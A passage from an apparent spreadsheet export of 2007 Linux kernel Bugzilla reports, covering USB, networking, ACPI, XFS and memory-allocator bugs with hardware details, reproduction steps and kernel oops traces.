    <t>Most recent kernel where this bug did *NOT* occur: 2.6.19.7 Distribution:Arch Hardware Environment:Asus G1 laptop Software Environment: Problem Description:When I use 2.6.20 kernel my dmesg show that about every second there is new message generated: "usb 5-7: reset high speed USB device using ehci_hcd and address 6" This device is (probably) small OLED display in ma laptop, which is not supported anyway. When I used 2.6.19.7 (vanilla) it didn't produce such warnings. With 2.6.20 (vanilla) it does. Also, my USB keyboard behaves in a strange way - when I keep one key pressed it repeats it few times, then it pauses for a while, repeats the key again, pauses and so on. Sometimes it also produces extra characters - for example 'modproooobee' instead of 'modprobe'. When I do modprobe -r ehci_hcd, my keyboard stops responding, and starts working again after a while, the OLED device is detected by lsusb command, but it stops producing this warning. 2.6.21 version has exactly the same issue. Steps to reproduce: Boot the laptop with 2.6.20 or 2.6.21 kernel.</t>
  </si>
  <si>
    <t>usb_suspend and scanner canoscan n670u</t>
  </si>
  <si>
    <t>2.6.20, 2.6.21-git~</t>
  </si>
  <si>
    <t>2007-05-06 02:47 UTC</t>
  </si>
  <si>
    <t>Elmar Neugebuer</t>
  </si>
  <si>
    <t>2007-09-12 11:18 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: Distribution: ubuntu 7.04 Hardware Environment: scanner canoscan n670u Software Environment: Problem Description: Is a usual problem with scanner and usb_suspend. The differenc is after scanner is attached it is not working if i disable autosuspend ( echo -1 &gt; /sys/module/usbcore/parameters/autosuspend ) it's not working too. But if i plug out scanner, disable autosupend, plugin and enable autosupend agene ewerything working. May be there is nothing bother about and just blacklist my scanner for usb_suspend.</t>
  </si>
  <si>
    <t>(net forcedeth) v0.56 delivers MAC-Address backwards</t>
  </si>
  <si>
    <t>2.6.18-4</t>
  </si>
  <si>
    <t>2007-05-07 05:48 UTC</t>
  </si>
  <si>
    <t>Konvi</t>
  </si>
  <si>
    <t>2008-09-23 11:13 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.20-15 Distribution: Debian Etch (just basic installation via netinstall cd) Hardware Environment: Mainboard MSI K9NBPM2-FID (nforce 430 chipset) or GA-M61P-S3 (nforce 430 chipset) Realtek RTL8211 Gigabit Ethernet controller(onboard) AMD Athlon 64 X2 4200+ 4 GB DDR2-667 RAM Software Environment: Debian Etch Problem Description: MAC-Address of the onboard lan controller is 00:1A:4D:63:A4:9C If i try to configure the ethernet card via dhcp, a dhcp request is started with following mac-address: 9C:A4:63:4D:1A:00 ifconfig eth0 shows the mac-address backwards, too (-&gt; 9C:A4:63:4D:1A:00)</t>
  </si>
  <si>
    <t>usb port on the dock not connected after docking</t>
  </si>
  <si>
    <t>2007-05-07 18:13 UTC</t>
  </si>
  <si>
    <t>2007-06-11 12:51 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: Distribution: Debian testing Hardware Environment: Thinkpad A21m + docking station(Type 2631) USB 1.1 Software Environment: module uhci_hcd,ehci_hcd Problem Description: lsusb not show usb ports after docking. Port on the dock not working. If I booted with dock, i see usb port in the dock. Port on the dock working. Steps to reproduce: Boot laptop undocked. lsusb -vvv Dock laptop to dock[ac connected] lsusb -vvv No change about lsusb -vvv output. More info in next attachment. I am ready for testing. Howto debug this ? USB debug message show nothing. Unload and load module uhci-hcd doesn't help. More info about laptop: http://bugme.osdl.org/show_bug.cgi?id=7264 acpi table http://acpi.sourceforge.net/dsdt/view.php?id=689 usb devices database - record about dock usb device - http://www.qbik.ch/usb/devices/showdev.php?id=3706</t>
  </si>
  <si>
    <t>ip6sic causes bug during interrupt handling</t>
  </si>
  <si>
    <t>2.6.21-ga989705c and earlier</t>
  </si>
  <si>
    <t>2007-05-08 02:47 UTC</t>
  </si>
  <si>
    <t>2007-07-15 11:13 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: had this since 2.6.20, didnt test earlier versions Distribution: gentoo Hardware Environment: p3 Software Environment: gcc 4.1.2 Problem Description: running ip6sic with the following seed ip6sic -i lo -d ::1 -p 2000 -r 32321 causes this oops [ 69.293000] Oops: 0000 [#1] [ 69.293000] PREEMPT [ 69.293000] Modules linked in: [ 69.293000] CPU: 0 [ 69.293000] EIP: 0060:[&lt;c0548b76&gt;] Not tainted VLI [ 69.293000] EFLAGS: 00010282 (2.6.21-ga989705c #7) [ 69.293000] EIP is at ipv6_hop_jumbo+0x26/0x180 [ 69.293000] eax: 00000000 ebx: ce61bc08 ecx: 00000001 edx: 00000103 [ 69.293000] esi: ce750166 edi: 000000fd ebp: c0773ed8 esp: c0773ec0 [ 69.293000] ds: 007b es: 007b fs: 0000 gs: 0033 ss: 0068 [ 69.293000] Process ip6sic (pid: 4607, ti=c0773000 task=cf332070 task.ti=cf002000) [ 69.293000] Stack: c06c4ccc 000000fb c0773ef8 00000246 c071ae9c 0000002a c0773f08 c054837f [ 69.293000] ce61bc08 c055a39d c0773f38 c071ae94 ce61bc08 ce75013c 00000306 ce61bc08 [ 69.293000] c0773f38 ce61bc44 c0773f18 c0548ed1 00000000 cf8bdd84 c0773f48 c052807e [ 69.293000] Call Trace: [ 69.293000] [&lt;c010485a&gt;] show_trace_log_lvl+0x1a/0x30 [ 69.293000] [&lt;c0104919&gt;] show_stack_log_lvl+0xa9/0xd0 [ 69.293000] [&lt;c0104b5b&gt;] show_registers+0x21b/0x3a0 [ 69.293000] [&lt;c0104de3&gt;] die+0x103/0x260 [ 69.293000] [&lt;c01162c2&gt;] do_page_fault+0x2d2/0x610 [ 69.293000] [&lt;c05a5732&gt;] error_code+0x6a/0x70 [ 69.293000] [&lt;c054837f&gt;] ip6_parse_tlv+0xef/0x130 [ 69.293000] [&lt;c0548ed1&gt;] ipv6_parse_hopopts+0x41/0xb0 [ 69.293000] [&lt;c052807e&gt;] ipv6_rcv+0x1be/0x370 [ 69.293000] [&lt;c04b32fb&gt;] netif_receive_skb+0x21b/0x2b0 [ 69.293000] [&lt;c04b52d2&gt;] process_backlog+0x82/0xf0 [ 69.293000] [&lt;c04b558b&gt;] net_rx_action+0xab/0x1c0 [ 69.293000] [&lt;c0120cd2&gt;] __do_softirq+0x72/0xe0 [ 69.293000] [&lt;c010627a&gt;] do_softirq+0x8a/0xf0 [ 69.293000] [&lt;c0120fd5&gt;] local_bh_enable+0xa5/0x160 [ 69.293000] [&lt;c04b5738&gt;] dev_queue_xmit+0x98/0x330 [ 69.293000] [&lt;c055a678&gt;] packet_sendmsg+0x208/0x260 [ 69.293000] [&lt;c04a8594&gt;] sock_sendmsg+0xc4/0xf0 [ 69.293000] [&lt;c04a889f&gt;] sys_sendto+0xbf/0xe0 [ 69.293000] [&lt;c04a97c7&gt;] sys_socketcall+0x187/0x260 [ 69.293000] [&lt;c0104132&gt;] sysenter_past_esp+0x5f/0x99 [ 69.293000] ======================= [ 69.293000] Code: 90 8d 74 26 00 55 89 e5 56 53 83 ec 10 8b 18 8b 4b 78 8d 34 11 80 7e 01 04 74 3b a1 10 3c 72 c0 85 c0 0f 85 7d 00 00 00 8b 43 1c &lt;8b&gt; 80 8c 00 00 00 85 c0 74 09 8b 80 38 01 00 00 ff 40 08 a1 e4 [ 69.293000] EIP: [&lt;c0548b76&gt;] ipv6_hop_jumbo+0x26/0x180 SS:ESP 0068:c0773ec0 [ 69.305000] Kernel panic - not syncing: Fatal exception in interrupt Steps to reproduce:</t>
  </si>
  <si>
    <t>panic with e1000 driver on HP Integrity servers</t>
  </si>
  <si>
    <t>2.6.21-git</t>
  </si>
  <si>
    <t>2007-05-08 12:23 UTC</t>
  </si>
  <si>
    <t>Doug Chapman</t>
  </si>
  <si>
    <t>2007-05-22 13:05 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: worked in 2.6.21 broken when e0aac5a289b1dacbc94bd9ae8c449bcdf9ab508c was merged into git. Distribution: Fedora7/RHEL5 Hardware Environment: HP rx4640, rx6600, and rx2620 Software Environment: Problem Description: Panic when bringing up eth0 (which is an e1000 device). I will attach the full stack trace as a separate file. I have narrowed this down to this commit. I can revert just this commit from the current head and the problem goes away. commit e0aac5a289b1dacbc94bd9ae8c449bcdf9ab508c Author: Auke Kok &lt;auke-jan.h.kok@intel.com&gt; Date: Tue Mar 6 08:57:21 2007 -0800 e1000: FIX: be ready for incoming irq at pci_request_irq DEBUG_SHIRQ code exposed that e1000 was not ready for incoming interrupts after having called pci_request_irq. This obviously requires us to finish our software setup which assigns the irq handler before we request the irq. Signed-off-by: Auke Kok &lt;auke-jan.h.kok@intel.com&gt; Signed-off-by: Jeff Garzik &lt;jeff@garzik.org&gt; Steps to reproduce: Boot the latest kernel on HP ia64 server with e1000 device.</t>
  </si>
  <si>
    <t>EC: slow ACPI sensors starting at 2.6.20-rc2, unless ec_intr=0</t>
  </si>
  <si>
    <t>2007-05-09 08:29 UTC</t>
  </si>
  <si>
    <t>Aur</t>
  </si>
  <si>
    <t>2008-10-17 21:38 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.20-rc1 and lower Distribution: Debian SID Hardware Environment: Amilo A CY26 Software Environment: Problem Description: From kernel 2.6.20, I have a problem with all sensors (sensors-applet for gnome). When my gnome session starts, everything starts except some applets which freezes gnome-panel during about 1 minute. So I tried to search the origin of this problem. This problem appear with 2.6.20-rc2 version. I also discovered that `cat /proc/acpi/thermal_zone/THRM/temperature` command prints immedialty the temperature with kernel releases &lt; 2.6.20-rc2. But after this version, this command prints the result after 3-5 seconds. I also add that startup of the kernel is more slower since 2.6.20-rc2. If you need more information, i'm ready to answer your questions. Steps to reproduce:</t>
  </si>
  <si>
    <t>Kernel panic on boot</t>
  </si>
  <si>
    <t>2.6.21-mm2</t>
  </si>
  <si>
    <t>2007-05-09 12:47 UTC</t>
  </si>
  <si>
    <t>2007-05-10 10:07 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.21-mm1 Distribution: Fedora Devel Hardware Environment: AMD X2 on CK804 (sata_nv) + sata_sil Software Environment: lvm over md raid1 Problem Description: Kernel panic on boot</t>
  </si>
  <si>
    <t>applications under wine freezes</t>
  </si>
  <si>
    <t>2007-05-09 19:37 UTC</t>
  </si>
  <si>
    <t>charles gagalac</t>
  </si>
  <si>
    <t>2008-09-23 11:15 UTC</t>
  </si>
  <si>
    <t>Most recent commit where this bug did *NOT* occur: commit a989705c4cf6e6c1a339c95f9daf658b4ba88ca8 Merge: 2d56d3c... d291825... Author: Linus Torvalds &lt;torvalds@woody.linux-foundation.org&gt; Date: Mon May 7 12:34:57 2007 -0700 Distribution: slackware 11.0 Problem Description: applications, namely starcraft and pokerstars, running under wine freezes shortly after starting the app. bisect produced the following commit: commit 6192bd536f96c6a0d969081bc71ae24f9319bfdc Author: Davide Libenzi &lt;davidel@xmailserver.org&gt; Date: Tue May 8 00:25:41 2007 -0700</t>
  </si>
  <si>
    <t>NOHZ: BUG: soft lockup detected on CPU#0!</t>
  </si>
  <si>
    <t>2007-05-10 06:16 UTC</t>
  </si>
  <si>
    <t>2007-11-16 14:56 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.20.x Distribution: Debian/testing Hardware Environment: Dual Xeon with SMP kernel Software Environment: Problem Description: dmesg reports NOHZ: local_softirq_pending 02 NOHZ: local_softirq_pending 02 NOHZ: local_softirq_pending 02 NOHZ: local_softirq_pending 02 NOHZ: local_softirq_pending 02 NOHZ: local_softirq_pending 02 NOHZ: local_softirq_pending 02 NOHZ: local_softirq_pending 02 NOHZ: local_softirq_pending 02 NOHZ: local_softirq_pending 02 NOHZ: local_softirq_pending 02 NOHZ: local_softirq_pending 02 NOHZ: local_softirq_pending 02 NOHZ: local_softirq_pending 02 NOHZ: local_softirq_pending 02 NOHZ: local_softirq_pending 02 Clocksource tsc unstable (delta = 4686825172 ns) NOHZ: local_softirq_pending 08 NOHZ: local_softirq_pending 08 NOHZ: local_softirq_pending 08 NOHZ: local_softirq_pending 08 NOHZ: local_softirq_pending 08 NOHZ: local_softirq_pending 08 NOHZ: local_softirq_pending 08 NOHZ: local_softirq_pending 08 NOHZ: local_softirq_pending 08 NOHZ: local_softirq_pending 08 NOHZ: local_softirq_pending 08 NOHZ: local_softirq_pending 08 NOHZ: local_softirq_pending 08 NOHZ: local_softirq_pending 08 BUG: soft lockup detected on CPU#0! [&lt;c013c69a&gt;] softlockup_tick+0x90/0xb5 [&lt;c0123564&gt;] update_process_times+0x28/0x5e [&lt;c01328fe&gt;] tick_sched_timer+0x48/0x9a [&lt;c012eff1&gt;] hrtimer_interrupt+0x13f/0x1c5 [&lt;c010e75d&gt;] smp_apic_timer_interrupt+0x55/0x85 [&lt;c011461c&gt;] __wake_up_common+0x39/0x59 [&lt;c01048d0&gt;] apic_timer_interrupt+0x28/0x30 [&lt;c02db6d0&gt;] rt_check_expire+0xf8/0x160 [&lt;c02db5d8&gt;] rt_check_expire+0x0/0x160 [&lt;c01227b7&gt;] run_timer_softirq+0x11e/0x17a [&lt;c011ece9&gt;] it_real_fn+0x0/0x17 [&lt;c011ecfb&gt;] it_real_fn+0x12/0x17 [&lt;c011f8c2&gt;] __do_softirq+0x74/0xd9 [&lt;c011f794&gt;] ksoftirqd+0x0/0xba [&lt;c0106624&gt;] do_softirq+0x5f/0xa8 [&lt;c011f807&gt;] ksoftirqd+0x73/0xba [&lt;c012bd02&gt;] kthread+0xae/0xd3 [&lt;c012bc54&gt;] kthread+0x0/0xd3 [&lt;c0104a53&gt;] kernel_thread_helper+0x7/0x14 ======================= NOHZ: local_softirq_pending 22 NOHZ: local_softirq_pending 22 NOHZ: local_softirq_pending 22 NOHZ: local_softirq_pending 22 NOHZ: local_softirq_pending 22 NOHZ: local_softirq_pending 22 NOHZ: local_softirq_pending 22 NOHZ: local_softirq_pending 22 NOHZ: local_softirq_pending 22 NOHZ: local_softirq_pending 22 NOHZ: local_softirq_pending 22 NOHZ: local_softirq_pending 22 NOHZ: local_softirq_pending 22 NOHZ: local_softirq_pending 22 NOHZ: local_softirq_pending 22 NOHZ: local_softirq_pending 22 Steps to reproduce:</t>
  </si>
  <si>
    <t>Christoph Lameter</t>
  </si>
  <si>
    <t>atl1 module APIC error when MSI enabled in kernel 2.6.21</t>
  </si>
  <si>
    <t>2007-05-12 14:46 UTC</t>
  </si>
  <si>
    <t>Gregory Krzystek</t>
  </si>
  <si>
    <t>2007-06-24 19:40 UTC</t>
  </si>
  <si>
    <t>Distribution:Gentoo/amd64 Problem Description: when try to up eth0 gernel produces errors: after /etc/init.d/net.eth0 start i can't establish any connection in /var/log/messages i see: May 13 19:16:49 localhost APIC error on CPU0: 04(08) May 13 19:16:49 localhost atl1: eth0 link is up 100 Mbps full duplex May 13 19:16:49 localhost APIC error on CPU0: 08(08) May 13 19:16:49 localhost APIC error on CPU0: 08(08) ... sometimes system rebooting without any error in logs there is workaround: add pci=nomsi into kernel boot comand line.</t>
  </si>
  <si>
    <t>Oops: 0010 [1] SMP</t>
  </si>
  <si>
    <t>2.6.21-mm2 - 2.6.22-rc2.mm1</t>
  </si>
  <si>
    <t>2007-05-13 14:03 UTC</t>
  </si>
  <si>
    <t>2008-09-08 22:41 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.21-mm1 (though I didn't test it that long) Distribution: Fedora Devel Hardware Environment: AMD C2 on CK804 Software Environment: Normal workload (building a small package) Problem Description: Steps to reproduce: May 13 22:59:43 rousalka kernel: Unable to handle kernel NULL pointer dereference at 0000000000000000 RIP: May 13 22:59:43 rousalka kernel: [&lt;0000000000000000&gt;] May 13 22:59:43 rousalka kernel: PGD bf1a067 PUD f295067 PMD 0 May 13 22:59:43 rousalka kernel: Oops: 0010 [1] SMP May 13 22:59:43 rousalka kernel: CPU 0 May 13 22:59:43 rousalka kernel: Pid: 8758, comm: bash Not tainted 2.6.21-9.mm2.fc7.nim #1 May 13 22:59:43 rousalka kernel: RIP: 0010:[&lt;0000000000000000&gt;] [&lt;0000000000000000&gt;] May 13 22:59:43 rousalka kernel: RSP: 0018:ffff81000ffedee0 EFLAGS: 00010296 May 13 22:59:43 rousalka kernel: RAX: ffffffff804426a0 RBX: ffff81000abe6a80 RCX: 00007fff565bbdc4 May 13 22:59:43 rousalka kernel: RDX: 0000000000005410 RSI: ffff81000abe6a80 RDI: ffff810009cc6fa0 May 13 22:59:43 rousalka kernel: RBP: 00007fff565bbdc4 R08: 0000000000000000 R09: 00000000009033a4 May 13 22:59:43 rousalka kernel: R10: 0000000000000008 R11: 0000000000000246 R12: 0000000000005410 May 13 22:59:43 rousalka kernel: R13: 00000000000000ff R14: 00000000000000ff R15: 0000000000000000 May 13 22:59:43 rousalka kernel: FS: 00002b2d544faf40(0000) GS:ffffffff8056b000(0000) knlGS:0000000000000000 May 13 22:59:43 rousalka kernel: CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b May 13 22:59:43 rousalka kernel: CR2: 0000000000000000 CR3: 000000000bdf4000 CR4: 00000000000006e0 May 13 22:59:43 rousalka kernel: Process bash (pid: 8758, threadinfo ffff81000ffec000, task ffff81000bc82ac0) May 13 22:59:43 rousalka kernel: Stack: ffffffff8028545d ffff81000abe6a80 00007fff565bbdc4 00007fff565bbdc4 May 13 22:59:43 rousalka kernel: ffffffff802856ca 0000000000005410 00000000000000ff ffff81000abe6a80 May 13 22:59:43 rousalka kernel: 0000000000000000 00007fff565bbdc4 0000000000005410 00000000000000ff May 13 22:59:43 rousalka kernel: Call Trace: May 13 22:59:43 rousalka kernel: [&lt;ffffffff8028545d&gt;] do_ioctl+0x55/0x6b May 13 22:59:43 rousalka kernel: [&lt;ffffffff802856ca&gt;] vfs_ioctl+0x257/0x270 May 13 22:59:43 rousalka kernel: [&lt;ffffffff8028573c&gt;] sys_ioctl+0x59/0x79 May 13 22:59:43 rousalka kernel: [&lt;ffffffff8020955c&gt;] tracesys+0xdc/0xe1 May 13 22:59:43 rousalka kernel: May 13 22:59:43 rousalka kernel: INFO: lockdep is turned off. May 13 22:59:43 rousalka kernel: May 13 22:59:43 rousalka kernel: Code: Bad RIP value. May 13 22:59:43 rousalka kernel: RIP [&lt;0000000000000000&gt;] May 13 22:59:43 rousalka kernel: RSP &lt;ffff81000ffedee0&gt; May 13 22:59:43 rousalka kernel: CR2: 0000000000000000</t>
  </si>
  <si>
    <t>kbuild warnigs 2.6.22-rc1</t>
  </si>
  <si>
    <t>2.6.22-rc1 - 2.6.22-rc3</t>
  </si>
  <si>
    <t>2007-05-14 09:20 UTC</t>
  </si>
  <si>
    <t>2007-10-20 01:05 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: Distribution: debian gnu/linux 4.0 etch i386 Hardware Environment: p4ht (northwood) asus p4c800 ati r9600 Software Environment: debian gnu/linux 4.0 etch i386 Problem Description: warning &amp;&amp; Steps to reproduce: make menuconfig, make in kernel src directory</t>
  </si>
  <si>
    <t>kernel BUG at include/linux/slub_def.h:88 kmalloc_index()</t>
  </si>
  <si>
    <t>2.6.22-rc1</t>
  </si>
  <si>
    <t>2007-05-14 10:15 UTC</t>
  </si>
  <si>
    <t>Cherwin R. Nooitmeer</t>
  </si>
  <si>
    <t>2008-09-23 11:16 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: None, first occurance of SLUB Distribution: Debian unstable Hardware Environment: /proc/cpuinfo processor : 0 vendor_id : GenuineIntel cpu family : 15 model : 2 model name : Intel(R) Celeron(R) CPU 2.40GHz stepping : 9 cpu MHz : 2398.007 cache size : 128 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 2 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe cid xtpr bogomips : 4797.98 clflush size : 64 /proc/meminfo MemTotal: 774060 kB MemFree: 12680 kB Buffers: 26520 kB Cached: 348516 kB SwapCached: 760 kB Active: 408696 kB Inactive: 236228 kB SwapTotal: 498004 kB SwapFree: 495652 kB Dirty: 712 kB Writeback: 0 kB AnonPages: 269148 kB Mapped: 81596 kB Slab: 22912 kB SReclaimable: 15616 kB SUnreclaim: 7296 kB PageTables: 2044 kB NFS_Unstable: 0 kB Bounce: 0 kB CommitLimit: 885032 kB Committed_AS: 533908 kB VmallocTotal: 253912 kB VmallocUsed: 4048 kB VmallocChunk: 249356 kB lspci 00:00.0 Host bridge: Intel Corporation 82852/82855 GM/GME/PM/GMV Processor to I/O Controller (rev 02) 00:00.1 System peripheral: Intel Corporation 82852/82855 GM/GME/PM/GMV Processor to I/O Controller (rev 02) 00:00.3 System peripheral: Intel Corporation 82852/82855 GM/GME/PM/GMV Processor to I/O Controller (rev 02) 00:02.0 VGA compatible controller: Intel Corporation 82852/855GM Integrated Graphics Device (rev 02) 00:02.1 Display controller: Intel Corporation 82852/855GM Integrated Graphics Device (rev 02) 00:1d.0 USB Controller: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) USB UHCI Controller #1 (rev 01) 00:1d.1 USB Controller: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) USB UHCI Controller #2 (rev 01) 00:1d.2 USB Controller: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) USB UHCI Controller #3 (rev 01) 00:1d.7 USB Controller: Intel Corporation 82801DB/DBM (ICH4/ICH4-M) USB2 EHCI Controller (rev 01) 00:1e.0 PCI bridge: Intel Corporation 82801 Mobile PCI Bridge (rev 81) 00:1f.0 ISA bridge: Intel Corporation 82801DBM (ICH4-M) LPC Interface Bridge (rev 01) 00:1f.1 IDE interface: Intel Corporation 82801DBM (ICH4-M) IDE Controller (rev 01) 00:1f.5 Multimedia audio controller: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) AC'97 Audio Controller (rev 01) 00:1f.6 Modem: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) AC'97 Modem Controller (rev 01) 02:01.0 Ethernet controller: Broadcom Corporation BCM4401 100Base-T (rev 01) 02:02.0 Network controller: Broadcom Corporation BCM4306 802.11b/g Wireless LAN Controller (rev 03) 02:04.0 CardBus bridge: Texas Instruments PCI1510 PC card Cardbus Controller Software Environment: Linux version 2.6.22-rc1-v1.1 (root@dellstation) (gcc version 4.1.3 20070429 (prerelease) (Debian 4.1.2-6)) #3 PREEMPT Mon May 14 05:14:05 CEST 2007 lsmod: Module Size Used by sn9c102 114948 0 gspca 639184 0 compat_ioctl32 1280 1 sn9c102 videodev 24192 2 sn9c102,gspca v4l1_compat 11780 1 videodev v4l2_common 14464 2 sn9c102,videodev i915 18816 2 drm 65812 3 i915 rfcomm 28700 0 l2cap 17668 5 rfcomm bluetooth 39908 4 rfcomm,l2cap ipv6 189540 10 bcm43xx 105448 0 b44 20876 0 yenta_socket 21260 0 rsrc_nonstatic 8320 1 yenta_socket rng_core 3972 1 bcm43xx gcc 4.1.3 GNU Make 3.81 ldconfig (GNU libc) 2.5 Problem Description: The kernel prints this message during boot: BUG: at include/linux/slub_def.h:88 kmalloc_index() [&lt;c014f67f&gt;] get_slab+0x43/0x1c6 [&lt;c014f875&gt;] __kmalloc+0xc/0x57 [&lt;f0a7b564&gt;] drm_rmdraw+0x0/0x27d [drm] [&lt;f0a7b698&gt;] drm_rmdraw+0x134/0x27d [drm] [&lt;f0a7b564&gt;] drm_rmdraw+0x0/0x27d [drm] [&lt;f0a7c1d0&gt;] drm_ioctl+0x144/0x18c [drm] [&lt;c01265ad&gt;] enqueue_hrtimer+0xe3/0xef [&lt;c015c184&gt;] do_ioctl+0x4c/0x64 [&lt;c015c3c7&gt;] vfs_ioctl+0x22b/0x23e [&lt;c015c40d&gt;] sys_ioctl+0x33/0x4e [&lt;c0103ca0&gt;] syscall_call+0x7/0xb ======================= Steps to reproduce: Enable these settings in .config CONFIG_SLUB_DEBUG=y CONFIG_SLUB=y CONFIG_DRM=m CONFIG_DRM_I915=m</t>
  </si>
  <si>
    <t>gettimeofday returning 1000000 in tv_usec on core2duo</t>
  </si>
  <si>
    <t>2007-05-14 21:19 UTC</t>
  </si>
  <si>
    <t>Daniel Gryniewicz</t>
  </si>
  <si>
    <t>2008-01-02 06:40 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.20 Distribution: Gentoo Hardware Environment: core2duo T7200 (all reporters had this same CPU) Software Environment: Linux 2.6.21, glibc 2.5 Problem Description: gettimeofday returns 1 - 1000000 in tv_usec, not 0 - 999999 This does not happen on any of my AMD-based 32 or 64 bit boxes, only on my core2duo; I have 2 other reports of this problem, all on T7200's Steps to reproduce: call gettimeofday a lot. Eventually, you'll get 1000000 returned in tv_usec. My average is ~1 in 1000000 calls. I've attached my test program, with output from various boxes. One of the other reporters tried the test program too, and got similar output. .config will be attached too.</t>
  </si>
  <si>
    <t>cmm_cm4000_release wants a "struct pcmcia_device *" arg, but cm4000_release gives it a "struct cm4000_dev *"</t>
  </si>
  <si>
    <t>2007-05-16 13:52 UTC</t>
  </si>
  <si>
    <t>Bill McConnaughey</t>
  </si>
  <si>
    <t>2008-09-23 09:41 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: Distribution: Hardware Environment: Software Environment: Problem Description: These exerpts from linux-2.6.18/drivers/char/pcmcia/cm4000_cs.c show an inconsistency: "cmm_cm4000_release" takes a "struct pcmcia_device *" argument, but "cm4000_release" is giving it a "struct cm4000_dev *" argument. I don't have the means to test this (I'm studying the code as an example). struct cm4000_dev { struct pcmcia_device *p_dev; ..... } static void cmm_cm4000_release(struct pcmcia_device * link) { struct cm4000_dev *dev = link-&gt;priv; ..... wait_event(dev-&gt;devq, (link-&gt;open == 0)); ..... } static void cm4000_release(struct pcmcia_device *link) { cmm_cm4000_release(link-&gt;priv); /* delay release until device closed */ pcmcia_disable_device(link); } static int cm4000_probe(struct pcmcia_device *link) { struct cm4000_dev *dev; ..... dev-&gt;p_dev = link; link-&gt;priv = dev; ..... } Other stuff: -- cmm_open has variable "rc" which is set to 0 but not used -- where cm4000_config calls pcmcia_request_configuration, in case of error it sets fail_fn and goes to cs_release. I think that should be cs_failed. Steps to reproduce:</t>
  </si>
  <si>
    <t>(patch queued) if a file is  open without O_LARGEFILE hfsplus doesn't check that its size is &lt; 2GB</t>
  </si>
  <si>
    <t>linux-2.6.27-rc6</t>
  </si>
  <si>
    <t>2007-05-17 06:24 UTC</t>
  </si>
  <si>
    <t>2009-03-17 09:13 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: Distribution: Hardware Environment: Software Environment: Problem Description: Steps to reproduce: hfsplus doesn't use generic_file_open() cf. fs/hfsplus/inode.c</t>
  </si>
  <si>
    <t>2.6.20.11,  2.6.22-rc1</t>
  </si>
  <si>
    <t>2007-05-18 08:56 UTC</t>
  </si>
  <si>
    <t>2008-03-14 05:56 UTC</t>
  </si>
  <si>
    <t>8500 8530</t>
  </si>
  <si>
    <t>File on XFS is truncated at reboot with 2.6.22-rc1</t>
  </si>
  <si>
    <t>2007-05-18 13:31 UTC</t>
  </si>
  <si>
    <t>2008-09-23 11:17 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.21.1 Distribution: Gentoo Hardware Environment: PC, P4 3G, 1G mem Problem Description: I have a file on my XFS root filesystem (/etc/env.d/03opengl) that gets truncated to 33 bytes at each reboot, under the following two conditions: 1) i have modified the file under a 2.6.22-rc1 kernel. If I change it under a 2.6.21.1 kernel the problem does not occur. It does not make a difference if I boot to a 2.6.22-rc1 or 2.6.21.1 kernel. 2) the file has a specific inode. This particular file is generated by a script (eselect opengl set nvidia) on my system and when it is generated like this it gets inode 33554562. The problem occurs only with this inode. If I overwrite the file with vim it gets inode 33554595 or 33554596 and the problem does not occur. An observation about the content of the file: - any modifications I make to the part of the file before the point where it is truncated, are visible in the truncated file after reboot. Steps to reproduce: These are the steps I take to reproduce this on my system: 1) boot to kernel 2.6.22-rc1 with init=/bin/bash 2) mount -o remount,rw / 3) eselect opengl set nvidia (generates the file /etc/env.d/03opengl) 4) mount -o remount,ro / 5) sync 6) reboot 7) boot to any kernel with init=/bin/bash 8) cat /etc/env.d/03opengl</t>
  </si>
  <si>
    <t>kernel BUG at mm/slab.c:777</t>
  </si>
  <si>
    <t>2.6.22-rc2</t>
  </si>
  <si>
    <t>2007-05-19 10:01 UTC</t>
  </si>
  <si>
    <t>2007-05-29 06:28 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.22-rc1-git5 Distribution: Hardware Environment: Software Environment: Problem Description: May 19 18:30:58 pancs kernel: BUG: at mm/slab.c:777 __find_general_cachep() May 19 18:30:58 pancs kernel: [&lt;c0164b32&gt;] __kmalloc+0xb5/0xdc May 19 18:30:58 pancs kernel: [&lt;c02df74e&gt;] drm_rmdraw+0x26a/0x2ac May 19 18:30:58 pancs kernel: [&lt;c02df4e4&gt;] drm_rmdraw+0x0/0x2ac May 19 18:30:58 pancs kernel: [&lt;c02e0230&gt;] drm_ioctl+0xa6/0x1f6 May 19 18:30:58 pancs kernel: [&lt;c025ea03&gt;] file_has_perm+0x92/0x9a May 19 18:30:58 pancs kernel: [&lt;c0172574&gt;] do_ioctl+0x64/0x6d May 19 18:30:58 pancs kernel: [&lt;c01725cd&gt;] vfs_ioctl+0x50/0x26b May 19 18:30:58 pancs kernel: [&lt;c0172845&gt;] sys_ioctl+0x5d/0x6c May 19 18:30:58 pancs kernel: [&lt;c01026f6&gt;] sysenter_past_esp+0x5f/0x85 May 19 18:30:58 pancs 